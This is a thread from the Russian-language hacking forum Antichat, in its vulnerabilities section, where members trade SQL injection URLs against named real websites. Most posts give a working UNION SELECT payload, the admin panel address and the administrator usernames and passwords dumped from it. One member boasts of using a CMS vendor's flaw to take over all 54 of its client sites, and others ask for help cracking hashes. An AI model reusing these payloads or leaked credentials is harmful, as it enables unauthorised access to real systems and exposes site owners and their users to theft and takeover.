HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.08.2008, 20:25
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию

http://www.stoubos.gr/car_en.php?id=-1+union+select+concat(0x3a3a,username,0x3a3a,passw ord),2,3,4,5,6,7,8,9,10,11,12,13,14+from+stoub0s_c ars.users+limit+0,1

login: stoub0s pass: st9845st

http://stoubos.gr/admin

Зы: Админим буржуйский шоп....
 
Ответить с цитированием

  #2  
Старый 20.08.2008, 23:37
4p3
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
С нами: 9332069

Репутация: 92
По умолчанию

http://www.zaistinu.ru/admin - админка
http://www.zaistinu.ru/articles/?sid=949+union+select+login+from+admins/*
login=vma || login=editor1
password выдавать не хочет, зараза.

version = 5.0.32-Debian_7etch6-log

Кто ломанет, отпишетсь, пожалуйста.
 
Ответить с цитированием

  #3  
Старый 21.08.2008, 02:22
-=Static=-
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
С нами: 10260776

Репутация: 185
По умолчанию

Цитата:
Сообщение от 4p3  
http://www.zaistinu.ru/admin - админка
http://www.zaistinu.ru/articles/?sid=949+union+select+login+from+admins/*
login=vma || login=editor1
password выдавать не хочет, зараза.

version = 5.0.32-Debian_7etch6-log

Кто ломанет, отпишетсь, пожалуйста.
vma:091
Borey:ltqytrf1734
Alexander:78Borey
oleg:z9723011265
 
Ответить с цитированием

  #4  
Старый 21.08.2008, 09:07
4p3
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
С нами: 9332069

Репутация: 92
По умолчанию

Цитата:
Сообщение от -=Static=-  
vma:091
Borey:ltqytrf1734
Alexander:78Borey
oleg:z9723011265
Спасибо, я понял, пароль на vma совпадал с sid и он не высвечивался.
 
Ответить с цитированием

  #5  
Старый 21.08.2008, 00:02
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами: 9725544

Репутация: 246
По умолчанию

инет магазин
Код:
http://www.edenbio.com/garden/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
http://www.edenbio.com/administrator
ыыы оказалось я не 1

Последний раз редактировалось S0ulVortex; 21.08.2008 в 00:06..
 
Ответить с цитированием

  #6  
Старый 21.08.2008, 19:28
softrix
Новичок
Регистрация: 05.07.2008
Сообщений: 16
С нами: 9395645

Репутация: 7
По умолчанию

http://www.hotels-piter.spb.ru/pages_piter.php?idleft=-4+union+select+concat(login,7,password)+from+users

Только ХЗ от чего пароль, к админке не подходит !
Ну может кому интерестно пороет найдет, если найдете отпишитесь, любопытно !
 
Ответить с цитированием

  #7  
Старый 21.08.2008, 00:23
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами: 9725544

Репутация: 246
По умолчанию

карчое нашапке сайта написано так "морская среда и безопасность для европейской области"
Код:
http://mersea.santateresa.enea.it/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
 
Ответить с цитированием

  #8  
Старый 21.08.2008, 14:09
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию

http://www.bridesathotbobbins.co.uk/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a ,password,0x3a3a)+from+accounts/*

login:admin password:stolave22

Админим.....
 
Ответить с цитированием

  #9  
Старый 21.08.2008, 16:05
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию

Иногда из-за идиотизма одного страдают многие.......
Не успел запостить http://www.bridesathotbobbins.co.uk/

Как, совершенно ненароком, мой взор пал на маааханькую приписочку снизу... А именнно
Powered by Qwicsite Pro

Да,да дружок! Именно там где мы логинимся вместо нерадивого админа. Зайдя на сайт этой чудной смски, я с удивлением обнаружил что баг то не местного разлива, а именно роднной баг СМС и исправлть его никто нигде не брался!!!

http://www.qwic.co.uk/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a ,password)+from+accounts/*

Login:admin Pass:stolave22

Там есть подраздельчик Qwicsite Pro websites admin, заходим туда и админим сразу всех их клиентов!!! А их не много не мало - 54 штуки!!!!
 
Ответить с цитированием

  #10  
Старый 21.08.2008, 16:46
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами: 9550090

Репутация: 137
По умолчанию

http://www.farmnet.eu/wcr/index.php?page=news/detail&newsID=11+and+1=2+union+select+concat_ws(0x 3a,user(),version(),database()),2,3,4,5,6,7,8,9,10 ,11,12,13,14,15/*

user() = eu-info@localhost
version() = 5.0.27
database() = db02

http://www.farmnet.eu/wcr/index.php?page=log-in

wcr-team:maize
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.